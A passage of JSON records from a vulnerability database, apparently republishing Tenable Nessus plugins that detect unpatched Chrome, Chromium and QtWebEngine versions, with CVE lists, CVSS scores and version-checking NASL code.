"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701270.PASL", "href": "https://www.tenable.com/plugins/nnm/701270", "sourceData": "Binary data 701270.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. 
value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"qt5-qtwebengine-5.9.1-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:30:57", "description": "This update updates QtWebEngine to the 5.9.1 release, a security and bugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the Qt 5.9.1 release, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083, CVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to version 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder dialogs\n\n - [QTBUG-57675] Fixed WebEngineNewViewRequest::requestedUrl when opening window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without 
introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : qt5-qtwebengine (2017-1e34da27f3)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5083", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-1E34DA27F3.NASL", "href": "https://www.tenable.com/plugins/nessus/101583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-1e34da27f3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101583);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n 
\"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5083\",\n \"CVE-2017-5088\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-1e34da27f3\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 26 : qt5-qtwebengine (2017-1e34da27f3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to the 5.9.1 release, a security and\nbugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the\nQt 5.9.1 release, but only the QtWebEngine component is included in\nthis update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076,\nCVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083,\nCVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to\nversion 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and\n accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder\n dialogs\n\n - [QTBUG-57675] Fixed\n WebEngineNewViewRequest::requestedUrl when opening\n window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-1e34da27f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"qt5-qtwebengine-5.9.1-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:06", "description": "This update to Chromium 59.0.3071.86 fixes the following security issues :\n\n - CVE-2017-5070: Type confusion in V8\n\n - CVE-2017-5071: Out of bounds read in V8\n\n - CVE-2017-5072: Address spoofing in Omnibox\n\n - CVE-2017-5073: Use after free in print preview\n\n - CVE-2017-5074: Use after free in Apps Bluetooth\n\n - CVE-2017-5075: Information leak in CSP reporting\n\n - CVE-2017-5086: Address spoofing in Omnibox\n\n - CVE-2017-5076: Address spoofing in Omnibox\n\n - CVE-2017-5077: Heap buffer overflow in Skia\n\n - CVE-2017-5078: Possible command injection in mailto handling\n\n - CVE-2017-5079: UI spoofing in Blink\n\n - CVE-2017-5080: Use after free in credit card autofill\n\n - CVE-2017-5081: Extension verification bypass\n\n - CVE-2017-5082: Insufficient hardening in credit card editor\n\n - CVE-2017-5083: UI spoofing in Blink\n\n - CVE-2017-5085: Inappropriate JavaScript execution on WebUI pages", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2017-661)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-661.NASL", "href": "https://www.tenable.com/plugins/nessus/100676", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-661.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100676);\n script_version(\"3.9\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2017-661)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update to Chromium 59.0.3071.86 fixes the following security\nissues :\n\n - CVE-2017-5070: Type confusion in V8\n\n - CVE-2017-5071: Out of bounds read in V8\n\n - CVE-2017-5072: Address spoofing in Omnibox\n\n - CVE-2017-5073: Use after free in print preview\n\n - CVE-2017-5074: Use after free in Apps Bluetooth\n\n - CVE-2017-5075: Information leak in CSP reporting\n\n - CVE-2017-5086: Address spoofing in Omnibox\n\n - CVE-2017-5076: Address spoofing in Omnibox\n\n - CVE-2017-5077: Heap buffer overflow in Skia\n\n - CVE-2017-5078: Possible command injection in mailto\n handling\n\n - CVE-2017-5079: UI spoofing in Blink\n\n - CVE-2017-5080: Use after free in credit card autofill\n\n - CVE-2017-5081: Extension verification bypass\n\n - CVE-2017-5082: Insufficient hardening in credit card\n editor\n\n - CVE-2017-5083: UI spoofing in Blink\n\n - CVE-2017-5085: Inappropriate JavaScript execution on\n WebUI pages\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042833\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"chromedriver-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromedriver-debuginfo-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debuginfo-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debugsource-59.0.3071.86-104.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:46", "description": "The version of Google Chrome installed on the remote Windows host is prior to 59.0.3071.86. It is, therefore, affected by the following vulnerabilities :\n\n - A type confusion error exists in the Google V8 component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8 component that allows an unauthenticated, remote attacker to cause a denial of service condition or the disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox component that allows an attacker to spoof the address in the address bar. (CVE-2017-5072, CVE-2017-5076, CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview functionality that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth component that allows an unauthenticated, remote attacker to execute arbitrary code. 
(CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting component that allows an unauthenticated, remote attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling functionality that allows an unauthenticated, remote attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card autofill functionality that allows an attacker to have an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass extension verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor view functionality that allows an unauthenticated, remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component that allows an unauthenticated, remote attacker to execute arbitrary JavaScript code. 
(CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "Google Chrome < 59.0.3071.86 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_59_0_3071_86.NASL", "href": "https://www.tenable.com/plugins/nessus/100679", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100679);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n 
\"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_bugtraq_id(98861);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 59.0.3071.86 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 59.0.3071.86. It is, therefore, affected by the following\nvulnerabilities :\n\n - A type confusion error exists in the Google V8 component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8\n component that allows an unauthenticated, remote\n attacker to cause a denial of service condition or the\n disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox\n component that allows an attacker to spoof the address\n in the address bar. (CVE-2017-5072, CVE-2017-5076,\n CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview\n functionality that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth\n component that allows an unauthenticated, remote\n attacker to execute arbitrary code. 
(CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting\n component that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling\n functionality that allows an unauthenticated, remote\n attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an\n attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card\n autofill functionality that allows an attacker to have\n an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass extension\n verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor\n view functionality that allows an unauthenticated,\n remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component\n that allows an unauthenticated, remote attacker to\n execute arbitrary JavaScript code. 
(CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 59.0.3071.86 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'59.0.3071.86', severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:16", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X host is prior to 59.0.3071.86. It is, therefore, affected by the following vulnerabilities :\n\n - A type confusion error exists in the Google V8 component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8 component that allows an unauthenticated, remote attacker to cause a denial of service condition or the disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox component that allows an attacker to spoof the address in the address bar. (CVE-2017-5072, CVE-2017-5076, CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview functionality that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting component that allows an unauthenticated, remote attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia component due to improper validation of user-supplied input. 
